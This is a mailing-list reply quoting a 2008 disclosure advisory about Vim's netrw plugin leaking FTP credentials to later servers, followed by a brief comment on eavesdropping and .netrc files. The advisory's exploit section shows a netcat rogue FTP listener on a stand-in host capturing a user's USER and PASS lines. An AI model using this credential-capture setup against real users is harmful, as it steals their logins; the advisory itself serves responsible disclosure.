Re: Vim: Netrw: FTP User Name and Password Disclosure

[Tony Mechelynck <antoine.mechelynck () gmail com>]

On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product  : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact   : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
>
> The Vim Netrw Plugin shares the FTP user name and password across all
> FTP sessions.  Every time Vim makes a new FTP connection, it sends the
> user name and password of the previous FTP session to the FTP server.
>
>
> 2. BACKGROUND
>
>    ``Vim is an almost compatible version of the UNIX editor Vi.  Many new
>      features have been added: multi-level undo, syntax highlighting,
>      command line history, on-line help, spell checking, filename
>      completion, block operations, etc.''
>
>                 -- Vim README.txt
>
>    ``Netrw supports "transparent" editing of files on other machines
>      using [...] vim ftp://hostname/path/to/file''
>
>    ``Attempts to use ftp will prompt you for a user-id and a password.
>      These will be saved in global variables g:netrw_uid and
>      s:netrw_passwd; subsequent uses of ftp will re-use those two items
>      to simplify the further use of ftp.  However, if you need to use a
>      different user id and/or password, you'll want to call NetUserPass()
>      first.''
>
>                 -- Netrw Reference Manual (``pi_netrw.txt'')
>
>
> 3. VULNERABILITY
>
> Once vim successfully connects to an FTP server using a user name and
> password credentials, it will re-use them in all subsequent FTP
> sessions, regardless of the domain name or TCP port.
>
> This behaviour is documented, although the documentation states the
> credentials are ``retained on a per-session basis''.  Apparently the Vim
> session, not the FTP session:
>
>    ``g:netrw_uid      (ftp) user-id,    retained on a per-session basis
>      s:netrw_passwd   (ftp) password,   retained on a per-session basis''
>
>                 -- Netrw Reference Manual (``pi_netrw.txt'')
>
> Although FTP communication is not encrypted and therefore open to
> eavesdropping, if the access to the network is protected, a
> credentials-based access control is meaningful, and the credentials must
> be kept secret.  For example, an FTP connection to a virtual Xen
> instance on the same physical machine is secure; so is an FTP session
> over a local ethernet segment secured against access from untrusted
> parties.
>
>
> 4. EXPLOIT
>
> No adversary action on the part of the attacker is necessary, apart from
> keeping logs of the user name, password, source IP address, and other
> information about the FTP session.
>
> An example using netcat(1) for the rouge FTP server.  There is another
> FTP server already running on the machine:
>
>      # For the sake of this example, a custom hosts file.  Note that
>      # ftp.secure.example and ftp.rogue.example map to different IP
>      # addresses.
>      $ grep '\.example' /etc/hosts
>      127.0.1.1       ftp.secure.example
>      127.0.1.2       ftp.rogue.example
>      # There is a stock FTP server running already
>      $ netstat -plan | grep ftp
>      tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
>      # Start the rogue FTP server
>      $ printf '220\r\n331\r\n' \
>      | netcat -lp 31337 ftp.rogue.example>  credentials&
>      # We use the ex command for clarity.
>      $ ex ftp://ftp.secure.example/
>      Enter username: rdancer
>      Enter Password: *************
>      Entering Ex mode.  Type "visual" to go to Normal mode.
>      :spl ftp://ftp.rogue.example:31337/
>      "ftp://ftp.rogue.example:31337/";  --No lines in buffer--
>      :qa!
>      $ cat credentials
>      USER rdancer
>      PASS z5vS24u76OrGM
>
>
> 5. COPYRIGHT
>
> This advisory is Copyright 2008 Jan Minar<rdancer () rdancer org>
>
> Copying welcome, under the Creative Commons ``Attribution-Share Alike''
> License http://creativecommons.org/licenses/by-sa/2.0/uk/
>
> Code included herein, and accompanying this advisory, may be copied
> according to the GNU General Public License version 2, or the Vim
> license.  See the subdirectory ``licenses''.
>
> Various portions of the accompanying code may have been written by
> various parties.  Those parties may hold copyright, and those portions
> may be copied according to their respective licenses.
>
>
> 6. HISTORY
>
> 2008-08-12 Sent to:<bugs () vim org>,<vim-dev () vim org>,
>         <full-disclosure () lists grok org uk>,
>         <bugtraq () securityfocus com>,
>            Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)
>         <drchip () campbellfamily biz>

If the attacker has access to full logs of the FTP back-and-forth talk, 
is it possible to keep the username and password secret?

Netrw mentions that if there exists a .netrc file (which ftp will use if 
it is not world-readable, e.g. on Linux it needs 600 permissions) which 
includes an applicable "machine" or "default" line, the user won't be 
asked for a username and password (see ":help netrw-netrc"). I'm not 
sure whether and to what degree this applies to non-Unix-like OSes such 
as Windows.


Best regards,
Tony.
--
Lysistrata had a good idea.